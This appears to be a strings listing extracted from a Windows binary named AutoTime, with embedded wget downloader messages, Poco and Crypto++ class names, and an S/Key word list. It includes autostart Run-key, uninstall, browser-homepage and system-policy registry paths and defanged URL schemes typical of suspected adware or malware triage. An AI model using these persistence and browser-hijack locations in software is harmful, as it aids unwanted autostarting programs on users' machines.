HKEY_CURRENT_USER\Software\%s\appInstall\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%s
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\%s
X:X:X:X:X:X
X-X-X-X-X-X
%d.%d.%d.%d
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\
Rasapi32.dll
kernel32.dll
http\shell\open\command
%s /autostart
..\..\Src\Common\CommUtils.cpp
%s[%d]:%s
HKEY_USERS\%s\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
user32.dll
ntdll.dll
..\..\Src\Common\EncryptFile.cpp
%s[%d]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
_unlink: %s
Removing %s.
..\..\Src\Download\HttpDownload.cpp
FINISHED --%s--
Downloaded: %s bytes in %d files
No URLs found in %s.
Download quota (%s bytes) EXCEEDED!
Converted %d files in %.2f seconds.
Converting %s...
Unable to delete `%s': %s
Cannot convert links in %s: %s
%d-%d
Cannot back up %s as %s: %s
.orig
/index.html
%d; URL=%s
%s: %s: Not enough memory.
d:d:d
utime(%s): %s
d-d-d d:d:d
Failed to _unlink symlink `%s': %s
Get %.0f%% [%d/%d]
%.2f %s
%7.2f %s
Error parsing proxy URL %s: %s.
%s: %s.
Error in proxy URL %s: Must be HTTP.
%d redirections exceeded.
unlink: %s
%s.%d
ftp_proxy
http_proxy
..\..\Src\Download\DownLoadTask.cpp
Syntax error in Set-Cookie: %s at position %d.
Error in Set-Cookie, field `%s'
Cookie coming from %s attempted to set domain to %s
Cannot open cookies file `%s': %s
# Generated by Wget on %s.
# HTTP cookie file.
Error writing to `%s': %s
Error closing `%s': %s
PTF://
PTF://%s
hXXp://%s
Unsupported scheme
Bad port number
IPv6 addresses not supported
%s: %s
index.html
d\
*password*
%s: WGETRC points to %s, which doesn't exist.
%swget.ini
%s: Error in %s at line %d.
%s: Cannot read %s (%s).
%s: Invalid --execute command `%s'
%s: %s: Invalid boolean `%s', use `on' or `off'.
%s: %s: Invalid boolean `%s', use always, on, off, or never.
%s: %s: Invalid number `%s'.
%s: %s: Invalid byte value `%s'
%s: %s: Invalid time period `%s'
%s: %s: Invalid header `%s'.
HTTP/
Reusing connection to %s:%hu.
Referer: %s
Content-Type: application/x-www-form-urlencoded
POST data file missing: %s
%s %s HTTP/1.0
User-Agent: %s
Host: %s%s%s%s
Accept: %s
%s%s%s%s%s%s%s%s%s%s
Failed writing HTTP request: %s.
%s request sent, awaiting response...
Read error (%s) in headers.
- %s
http-equiv=
Location: %s%s
.html
(%s to go)
Refusing to truncate existing file `%s'.
File `%s' already there, will not retrieve.
Warning: wildcards not supported in HTTP.
--%s-- %s
%s => `%s'
(try:-)
Cannot write to `%s' (%s).
ERROR: Redirection (%d) without location.
%s ERROR %d: %s.
%d %s
%s URL:%s [%ld/%ld] -> "%s" [%d]
Server file no newer than local file `%s' -- not retrieving.
%s (%s) - `%s' saved [%ld/%ld]
%s URL:%s [%ld] -> "%s" [%d]
%s (%s) - `%s' saved [%ld]
%s (%s) - `%s' saved [%ld/%ld])
%s (%s) - Connection closed at byte %ld.
%s (%s) - Connection closed at byte %ld/%ld.
%s (%s) - Read error at byte %ld/%ld (%s).
%s (%s) - Read error at byte %ld (%s).
%A, %d-%b-%y %T
%a, %d %b %Y %T
%a %b %d %T %Y
%a, %d-%b-%Y %T
%s: Basic %s
%s:%s
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
Removing %s since it should be rejected.
http-equiv
%s: Cannot resolve incomplete link %s.
%s: Invalid URL %s: %s
%Y-%m-%d
%a %b %e %H:%M:%S %Y
%m/%d/%y
%I:%M:%S %p
%H:%M:%S
Resolving %s...
Found %s in g_host_name_addresses_map (%p)
failed: %s.
Wget %s%s
%s%s.HLP
Wget [%.0f%%] %s
Starting WinHelp %s
SetThreadExecutionState
Unable to convert `%s' to a bind address. Reverting to ANY.
Connecting to %s:%hu...
Connecting to %s[%s]:%hu...
Logging in as %s ...
%s@%s
The server refuses login.
Login incorrect.
==> TYPE %c ...
Unknown type `%c', closing control connection.
==> CWD %s ...
No such directory `%s'.
==> SIZE %s ...
couldn't connect to %s:%hu: %s
==> PORT ...
socket: %s
Bind error (%s).
Invalid PORT.
REST failed; will not truncate `%s'.
==> RETR %s ...
No such file `%s'.
No such file or directory `%s'.
accept: %s
[%s to go]
Length: %s
%s (%s) - Data connection: %s;
%s: %s, closing control connection.
%s (%s) -
File `%s' already there, not retrieving.
%s URL: %s [%ld] -> "%s" [%d]
.listing
Remote file no newer than local file `%s' -- not retrieving.
Removed `%s'.
Skipping directory `%s'.
Remote file is newer than local file `%s' -- retrieving.
Symlinks not supported, skipping symlink `%s'.
%s: corrupt time-stamp.
%s: unknown/unsupported file type.
%s/%s
Rejecting `%s'.
Not descending to `%s' as it is excluded/not-included.
No matches on pattern `%s'.
Wrote HTML-ized index to `%s'.
Wrote HTML-ized index to `%s' [%ld].
%*s[ skipping %dK ]
=%%
Invalid dot style specification `%s'; leaving unchanged.
-%%
%7.2f%s
ETA %d:d:d
ETA d:d
.netrc
login
password
%s: %s:%d: warning: "%s" token appears before any machine name
%s: %s:%d: unknown token "%s"
/robots.txt
Cannot open %s: %s
Loading robots.txt; please ignore errors.
%s%s%s
--> PASS Turtle Power!
--> %s
331 s/key
331 opiekey
PORT
%d,%d,%d,%d,%d,%d
WINDOWS_NT
Unsupported listing type, trying Unix listing parser.
%s%s%s@
Index of /%s on %s:%d
d:d
%d %s d
<a href="PTF://%s%s:%hu
(%s bytes)
-> %s
F:\pz_git\vendor\inc\Poco/SharedPtr.h
: this object doesn't support resynchronization
StreamTransformation: this object doesn't support random access
KeySize
: this object does't support a special last block
NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes
: this object doesn't support multiple channels
is not a valid key length
CryptoMaterial: this object does not support saving
CryptoMaterial: this object does not support loading
CryptoMaterial: this object does not support precomputation
GeneratableCryptoMaterial: this object does not support key/parameter generation
PK_MessageEncodingMethod: this signature scheme does not support message recovery
DL_ElgamalLikeSignatureAlgorithm: this signature scheme does not support message recovery
KeyDerivationParameters
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
TF_SignerBase: the recoverable message part is too long for the given key and algorithm
for this key
: this key is too short to encrypt any messages
for this public key
PK_Signer: key too short for this signature scheme
operation failed with error
F:\pz_git\vendor\inc\Poco/ScopedLock.h
F:\pz_git\vendor\inc\Poco/RefCountedObject.h
%s: Couldn't find usable socket driver.
?#%X.y
F:\pz_git\bin\AutoTime.pdb
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlW
WININET.dll
GetProcessHeap
CreatePipe
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegOpenKeyExA
RegOpenKeyA
ADVAPI32.dll
ShellExecuteW
ShellExecuteA
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
OPENGL32.dll
IPHLPAPI.DLL
VERSION.dll
GetCPInfo
RegQueryInfoKeyA
WS2_32.dll
PeekNamedPipe
zcÁ
ABEDABELABETABLEABUTACHEACIDACMEACREACTAACTSADAMADDSADENAFARAFROAGEEAHEMAHOYAIDAAIDEAIDSAIRYAJARAKINALANALECALGAALIAALLYALMAALOEALSOALTOALUMALVAAMENAMESAMIDAMMOAMOKAMOSAMRAANDYANEWANNAANNEANTEANTIAQUAARABARCHAREAARGOARIDARMYARTSARTYASIAASKSATOMAUNTAURAAUTOAVERAVIDAVISAVONAVOWAWAYAWRYBABEBABYBACHBACKBADEBAILBAITBAKEBALDBALEBALIBALKBALLBALMBANDBANEBANGBANKBARBBARDBAREBARKBARNBARRBASEBASHBASKBASSBATEBATHBAWDBAWLBEADBEAKBEAMBEANBEARBEATBEAUBECKBEEFBEENBEERBEETBELABELLBELTBENDBENTBERGBERNBERTBESSBESTBETABETHBHOYBIASBIDEBIENBILEBILKBILLBINDBINGBIRDBITEBITSBLABBLATBLEDBLEWBLOBBLOCBLOTBLOWBLUEBLUMBLURBOARBOATBOCABOCKBODEBODYBOGYBOHRBOILBOLDBOLOBOLTBOMBBONABONDBONEBONGBONNBONYBOOKBOOMBOONBOOTBOREBORGBORNBOSEBOSSBOTHBOUTBOWLBOYDBRADBRAEBRAGBRANBRAYBREDBREWBRIGBRIMBROWBUCKBUDDBUFFBULBBULKBULLBUNKBUNTBUOYBURGBURLBURNBURRBURTBURYBUSHBUSSBUSTBUSYBYTECADYCAFECAGECAINCAKECALFCALLCALMCAMECANECANTCARDCARECARLCARRCARTCASECASHCASKCASTCAVECEILCELLCENTCERNCHADCHARCHATCHAWCHEFCHENCHEWCHICCHINCHOUCHOWCHUBCHUGCHUMCITECITYCLADCLAMCLANCLAWCLAYCLODCLOGCLOTCLUBCLUECOALCOATCOCACOCKCOCOCODACODECODYCOEDCOILCOINCOKECOLACOLDCOLTCOMACOMBCOMECOOKCOOLCOONCOOTCORDCORECORKCORNCOSTCOVECOWLCRABCRAGCRAMCRAYCREWCRIBCROWCRUDCUBACUBECUFFCULLCULTCUNYCURBCURDCURECURLCURTCUTSDADEDALEDAMEDANADANEDANGDANKDAREDARKDARNDARTDASHDATADATEDAVEDAVYDAWNDAYSDEADDEAFDEALDEANDEARDEBTDECKDEEDDEEMDEERDEFTDEFYDELLDENTDENYDESKDIALDICEDIEDDIETDIMEDINEDINGDINTDIREDIRTDISCDISHDISKDIVEDOCKDOESDOLEDOLLDOLTDOMEDONEDOOMDOORDORADOSEDOTEDOUGDOURDOVEDOWNDRABDRAGDRAMDRAWDREWDRUBDRUGDRUMDUALDUCKDUCTDUELDUETDUKEDULLDUMBDUNEDUNKDUSKDUSTDUTYEACHEARLEARNEASEEASTEASYEBENECHOEDDYEDENEDGEEDGYEDITEDNAEGANELANELBAELLAELSEEMILEMITEMMAENDSERICEROSEVENEVEREVILEYEDFACEFACTFADEFAILFAINFAIRFAKEFALLFAMEFANGFARMFASTFATEFAWNFEARFEATFEEDFEELFEETFELLFELTFENDFERNFESTFEUDFIEFFIGSFILEFILLFILMFINDFINEFINKFIREFIRMFISHFISKFISTFITSFIVEFLAGFLAKFLAMFLATFLAWFLEAFLEDFLEWFLITFLOCFLOGFLOWFLUBFLUEFOALFOAMFOGYFOILFOLDFOLKFONDFONTFOODFOOLFOOTFORDFOREFORKFORMFORTFOSSFOULFOURFOWLFRAUFRAYFREDFREEFRETFREYFROGFROMFUELFULLFUMEFUNDFUNKFURYFUSEFUSSGAFFGAGEGAILGAINGAITGALAGALEGALLGALTGAMEGANGGARBGARYGASHGATEGAULGAURGAVEGAWKGEARGELDGENEGENTGERMGETSGIBEGIFTGILDGILLGILTGINAGIRDGIRLGISTGIVEGLADGLEEGLENGLIBGLOBGLOMGLOWGLUEGLUMGLUTGOADGOALGOATGOERGOESGOLDGOLFGONEGONGGOODGOOFGOREGORYGOSHGOUTGOWNGRABGRADGRAYGREGGREWGREYGRIDGRIMGRINGRITGROWGRUBGULFGULLGUNKGURUGUSHGUSTGWENGWYNHAAGHAASHACKHAILHAIRHALEHALFHALLHALOHALTHANDHANGHANKHANSHARDHARKHARMHARTHASHHASTHATEHATHHAULHAVEHAWKHAYSHEADHEALHEARHEATHEBEHECKHEEDHEELHEFTHELDHELLHELMHERBHERDHEREHEROHERSHESSHEWNHICKHIDEHIGHHIKEHILLHILTHINDHINTHIREHISSHIVEHOBOHOCKHOFFHOLDHOLEHOLMHOLTHOMEHONEHONKHOODHOOFHOOKHOOTHORNHOSEHOSTHOURHOVEHOWEHOWLHOYTHUCKHUEDHUFFHUGEHUGHHUGOHULKHULLHUNKHUNTHURDHURLHURTHUSHHYDEHYMNIBISICONIDEAIDLEIFFYINCAINCHINTOIONSIOTAIOWAIRISIRMAIRONISLEITCHITEMIVANJACKJADEJAILJAKEJANEJAVAJEANJEFFJERKJESSJESTJIBEJILLJILTJIVEJOANJOBSJOCKJOELJOEYJOHNJOINJOKEJOLTJOVEJUDDJUDEJUDOJUDYJUJUJUKEJULYJUNEJUNKJUNOJURYJUSTJUTEKAHNKALEKANEKANTKARLKATEKEELKEENKENOKENTKERNKERRKEYSKICKKILLKINDKINGKIRKKISSKITEKLANKNEEKNEWKNITKNOBKNOTKNOWKOCHKONGKUDOKURDKURTKYLELACELACKLACYLADYLAIDLAINLAIRLAKELAMBLAMELANDLANELANGLARDLARKLASSLASTLATELAUDLAVALAWNLAWSLAYSLEADLEAFLEAKLEANLEARLEEKLEERLEFTLENDLENSLENTLEONLESKLESSLESTLETSLIARLICELICKLIEDLIENLIESLIEULIFELIFTLIKELILALILTLILYLIMALIMBLIMELINDLINELINKLINTLIONLISALISTLIVELOADLOAFLOAMLOANLOCKLOFTLOGELOISLOLALONELONGLOOKLOONLOOTLORDLORELOSELOSSLOSTLOUDLOVELOWELUCKLUCYLUGELUKELULULUNDLUNGLURALURELURKLUSHLUSTLYLELYNNLYONLYRAMACEMADEMAGIMAIDMAILMAINMAKEMALEMALIMALLMALTMANAMANNMANYMARCMAREMARKMARSMARTMARYMASHMASKMASSMASTMATEMATHMAULMAYOMEADMEALMEANMEATMEEKMEETMELDMELTMEMOMENDMENUMERTMESHMESSMICEMIKEMILDMILEMILKMILLMILTMIMIMINDMINEMINIMINKMINTMIREMISSMISTMITEMITTMOANMOATMOCKMODEMOLDMOLEMOLLMOLTMONAMONKMONTMOODMOONMOORMOOTMOREMORNMORTMOSSMOSTMOTHMOVEMUCHMUCKMUDDMUFFMULEMULLMURKMUSHMUSTMUTEMUTTMYRAMYTHNAGYNAILNAIRNAMENARYNASHNAVENAVYNEALNEARNEATNECKNEEDNEILNELLNEONNERONESSNESTNEWSNEWTNIBSNICENICKNILENINANINENOAHNODENOELNOLLNONENOOKNOONNORMNOSENOTENOUNNOVANUDENULLNUMBOATHOBEYOBOEODINOHIOOILYOINTOKAYOLAFOLDYOLGAOLINOMANOMENOMITONCEONESONLYONTOONUSORALORGYOSLOOTISOTTOOUCHOUSTOUTSOVALOVENOVEROWLYOWNSQUADQUITQUODRACERACKRACYRAFTRAGERAIDRAILRAINRAKERANKRANTRARERASHRATERAVERAYSREADREALREAMREARRECKREEDREEFREEKREELREIDREINRENARENDRENTRESTRICERICHRICKRIDERIFTRILLRIMERINGRINKRISERISKRITEROADROAMROARROBEROCKRODEROILROLLROMEROODROOFROOKROOMROOTROSAROSEROSSROSYROTHROUTROVEROWEROWSRUBERUBYRUDERUDYRUINRULERUNGRUNSRUNTRUSERUSHRUSKRUSSRUSTRUTHSACKSAFESAGESAIDSAILSALESALKSALTSAMESANDSANESANGSANKSARASAULSAVESAYSSCANSCARSCATSCOTSEALSEAMSEARSEATSEEDSEEKSEEMSEENSEESSELFSELLSENDSENTSETSSEWNSHAGSHAMSHAWSHAYSHEDSHIMSHINSHODSHOESHOTSHOWSHUNSHUTSICKSIDESIFTSIGHSIGNSILKSILLSILOSILTSINESINGSINKSIRESITESITSSITUSKATSKEWSKIDSKIMSKINSKITSLABSLAMSLATSLAYSLEDSLEWSLIDSLIMSLITSLOBSLOGSLOTSLOWSLUGSLUMSLURSMOGSMUGSNAGSNOBSNOWSNUBSNUGSOAKSOARSOCKSODASOFASOFTSOILSOLDSOMESONGSOONSOOTSORESORTSOULSOURSOWNSTABSTAGSTANSTARSTAYSTEMSTEWSTIRSTOWSTUBSTUNSUCHSUDSSUITSULKSUMSSUNGSUNKSURESURFSWABSWAGSWAMSWANSWATSWAYSWIMSWUMTACKTACTTAILTAKETALETALKTALLTANKTASKTATETAUTTEALTEAMTEARTECHTEEMTEENTEETTELLTENDTENTTERMTERNTESSTESTTHANTHATTHEETHEMTHENTHEYTHINTHISTHUDTHUGTICKTIDETIDYTIEDTIERTILETILLTILTTIMETINATINETINTTINYTIRETOADTOGOTOILTOLDTOLLTONETONGTONYTOOKTOOLTOOTTORETORNTOTETOURTOUTTOWNTRAGTRAMTRAYTREETREKTRIGTRIMTRIOTRODTROTTROYTRUETUBATUBETUCKTUFTTUNATUNETUNGTURFTURNTUSKTWIGTWINTWITULANUNITURGEUSEDUSERUSESUTAHVAILVAINVALEVARYVASEVASTVEALVEDAVEILVEINVENDVENTVERBVERYVETOVICEVIEWVINEVISEVOIDVOLTVOTEWACKWADEWAGEWAILWAITWAKEWALEWALKWALLWALTWANDWANEWANGWANTWARDWARMWARNWARTWASHWASTWATSWATTWAVEWAVYWAYSWEAKWEALWEANWEARWEEDWEEKWEIRWELDWELLWELTWENTWEREWERTWESTWHAMWHATWHEEWHENWHETWHOAWHOMWICKWIFEWILDWILLWINDWINEWINGWINKWINOWIREWISEWISHWITHWOLFWONTWOODWOOLWORDWOREWORKWORMWORNWOVEWRITWYNNYALEYANGYANKYARDYARNYAWLYAWNYEAHYEARYELLYOGAYOKE
.?AVPropertyNotSupportedException@Poco@@
.?AVProcessHandleImpl@Poco@@
.?AVPipeImpl@Poco@@
.?AVWindows1250Encoding@Poco@@
.?AVWindows1251Encoding@Poco@@
.?AVWindows1252Encoding@Poco@@
.?AVHTTPException@Net@Poco@@
.?AVHTTPRequest@Net@Poco@@
.?AVHTTPMessage@Net@Poco@@
.?AVHTTPResponse@Net@Poco@@
.?AVHTTPClientSession@Net@Poco@@
.?AVHTTPSession@Net@Poco@@
.?AVUnsupportedRedirectException@Net@Poco@@
.?AVFTPException@Net@Poco@@
.?AVSMTPException@Net@Poco@@
.?AVWebSocketException@Net@Poco@@
.?AVUnsupportedFamilyException@Net@Poco@@
.?AV?$BasicBufferedStreamBuf@DU?$char_traits@D@std@@VHTTPBufferAllocator@Net@Poco@@@Poco@@
.?AVHTTPHeaderStreamBuf@Net@Poco@@
.?AVHTTPHeaderIOS@Net@Poco@@
.?AVHTTPHeaderInputStream@Net@Poco@@
.?AVHTTPHeaderOutputStream@Net@Poco@@
.?AVHTTPStreamBuf@Net@Poco@@
.?AVHTTPIOS@Net@Poco@@
.?AVHTTPInputStream@Net@Poco@@
.?AVHTTPOutputStream@Net@Poco@@
.?AVHTTPFixedLengthStreamBuf@Net@Poco@@
.?AVHTTPFixedLengthIOS@Net@Poco@@
.?AVHTTPFixedLengthInputStream@Net@Poco@@
.?AVHTTPFixedLengthOutputStream@Net@Poco@@
.?AVHTTPChunkedStreamBuf@Net@Poco@@
.?AVHTTPChunkedIOS@Net@Poco@@
.?AVHTTPChunkedInputStream@Net@Poco@@
.?AVHTTPChunkedOutputStream@Net@Poco@@
.?AVSAXNotSupportedException@XML@Poco@@
.?AVinvalid_operation@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVoperation_timed_out@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AV?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@
.?AV?$VariableKeyLength@$0BA@$0BA@$0CA@$07$03$0A@@CryptoPP@@
.?AVSimpleKeyingInterface@CryptoPP@@
.PAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$AlgorithmImpl@V?$SimpleKeyingInterfaceImpl@V?$TwoBases@VBlockCipher@CryptoPP@@URijndael_Info@2@@CryptoPP@@V12@@CryptoPP@@V12@@CryptoPP@@
.?AVHexEncoder@CryptoPP@@
.?AUNoChannelSupport@BufferedTransformation@CryptoPP@@
.?AVInvalidKeyLength@CryptoPP@@
.PAVRandomNumberGenerator@CryptoPP@@
.PAVBufferedTransformation@CryptoPP@@
.?AV?$DL_SignerImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_SignatureSchemeBase@VPK_Signer@CryptoPP@@V?$DL_PrivateKey@UECPPoint@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_PublicKeyImpl@VDL_GroupParameters_DSA@CryptoPP@@@CryptoPP@@
.PAV?$DL_GroupParameters_EC@VEC2N@CryptoPP@@@CryptoPP@@
.?AV?$DL_PublicKeyImpl@V?$DL_GroupParameters_EC@VECP@CryptoPP@@@CryptoPP@@@CryptoPP@@
.PAV?$DL_PrivateKey@UECPPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_KeyAgreementAlgorithm_DH@VInteger@CryptoPP@@U?$EnumToType@W4CofactorMultiplicationOption@CryptoPP@@$0A@@2@@CryptoPP@@
.?AVSimpleKeyAgreementDomain@CryptoPP@@
.?AV?$DL_PublicKeyImpl@V?$DL_GroupParameters_EC@VEC2N@CryptoPP@@@CryptoPP@@@CryptoPP@@
.PAV?$DL_PrivateKeyImpl@VDL_GroupParameters_DSA@CryptoPP@@@CryptoPP@@
.?AV?$DL_PublicKey_GFP@VDL_GroupParameters_DSA@CryptoPP@@@CryptoPP@@
.?AV?$DL_Base@V?$DL_PrivateKey@UEC2NPoint@CryptoPP@@@CryptoPP@@@CryptoPP@@
.PAV?$DL_GroupParameters@VInteger@CryptoPP@@@CryptoPP@@
.?AV?$DL_VerifierImpl@U?$DL_SignatureSchemeOptions@V?$DSA2@VSHA1@CryptoPP@@@CryptoPP@@UDL_Keys_DSA@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_VerifierBase@VInteger@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DSA2@VSHA1@CryptoPP@@@CryptoPP@@UDL_Keys_DSA@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@2@V?$DL_PublicKey_GFP@VDL_GroupParameters_DSA@CryptoPP@@@2@@CryptoPP@@
.PAV?$DL_GroupParameters@UEC2NPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_SignatureSchemeBase@VPK_Verifier@CryptoPP@@V?$DL_PublicKey@UECPPoint@CryptoPP@@@2@@CryptoPP@@
.PAV?$DL_GroupParameters_IntegerBasedImpl@VModExpPrecomputation@CryptoPP@@V?$DL_FixedBasePrecomputationImpl@VInteger@CryptoPP@@@2@@CryptoPP@@
.PAV?$DL_GroupParameters_EC@VECP@CryptoPP@@@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_VerifierBase@UEC2NPoint@CryptoPP@@@CryptoPP@@V?$DL_SS@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@2@@CryptoPP@@
.?AV?$DL_Base@V?$DL_PublicKey@UECPPoint@CryptoPP@@@CryptoPP@@@CryptoPP@@
.?AV?$DL_Base@V?$DL_PrivateKey@VInteger@CryptoPP@@@CryptoPP@@@CryptoPP@@
.?AV?$DL_VerifierImpl@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@CryptoPP@@@CryptoPP@@
.?AVKeyAgreementAlgorithm@CryptoPP@@
.?AVPrivateKeyAlgorithm@CryptoPP@@
.?AV?$DL_PrivateKeyImpl@V?$DL_GroupParameters_EC@VECP@CryptoPP@@@CryptoPP@@@CryptoPP@@
.?AVPKCS8PrivateKey@CryptoPP@@
.?AV?$AlgorithmImpl@V?$DL_SignerBase@UEC2NPoint@CryptoPP@@@CryptoPP@@V?$DL_SS@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@2@@CryptoPP@@
.?AV?$DL_PublicKey_EC@VEC2N@CryptoPP@@@CryptoPP@@
.?AV?$ASN1CryptoMaterial@VPrivateKey@CryptoPP@@@CryptoPP@@
.PAV?$DL_PublicKeyImpl@VDL_GroupParameters_DSA@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_VerifierBase@UECPPoint@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@2@V?$DL_PublicKey_EC@VECP@CryptoPP@@@2@@CryptoPP@@
.?AV?$DL_SignerImpl@U?$DL_SignatureSchemeOptions@V?$DSA2@VSHA1@CryptoPP@@@CryptoPP@@UDL_Keys_DSA@2@V?$DL_Algorithm_GDSA@VInteger@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA1@2@@CryptoPP@@@CryptoPP@@
.?AV?$DL_SimpleKeyAgreementDomainBase@VInteger@CryptoPP@@@CryptoPP@@
.?AV?$DL_PublicKey@UEC2NPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImpl@V?$DL_SignerBase@UECPPoint@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VECP@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VECP@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@2@V?$DL_PrivateKey_WithSignaturePairwiseConsistencyTest@V?$DL_PrivateKey_EC@VECP@CryptoPP@@@CryptoPP@@U?$ECDSA@VECP@CryptoPP@@VSHA256@2@@2@@2@@CryptoPP@@
.?AV?$DL_KeyAgreementAlgorithm@VInteger@CryptoPP@@@CryptoPP@@
.PAV?$DL_PublicKey@VInteger@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKey@VInteger@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKey@UECPPoint@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKeyImpl@VDL_GroupParameters_DSA@CryptoPP@@@CryptoPP@@
.?AV?$DL_PrivateKey_WithSignaturePairwiseConsistencyTest@V?$DL_PrivateKey_EC@VEC2N@CryptoPP@@@CryptoPP@@U?$ECDSA@VEC2N@CryptoPP@@VSHA256@2@@2@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_SignerBase@UEC2NPoint@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@2@V?$DL_PrivateKey_WithSignaturePairwiseConsistencyTest@V?$DL_PrivateKey_EC@VEC2N@CryptoPP@@@CryptoPP@@U?$ECDSA@VEC2N@CryptoPP@@VSHA256@2@@2@@2@@CryptoPP@@
.?AV?$DL_PublicKey@VInteger@CryptoPP@@@CryptoPP@@
.?AV?$DL_ObjectImplBase@V?$DL_VerifierBase@UEC2NPoint@CryptoPP@@@CryptoPP@@U?$DL_SignatureSchemeOptions@V?$DL_SS@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@CryptoPP@@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@H@CryptoPP@@U?$DL_Keys_ECDSA@VEC2N@CryptoPP@@@2@V?$DL_Algorithm_ECDSA@VEC2N@CryptoPP@@@2@VDL_SignatureMessageEncodingMethod_DSA@2@VSHA256@2@@2@V?$DL_PublicKey_EC@VEC2N@CryptoPP@@@2@@CryptoPP@@
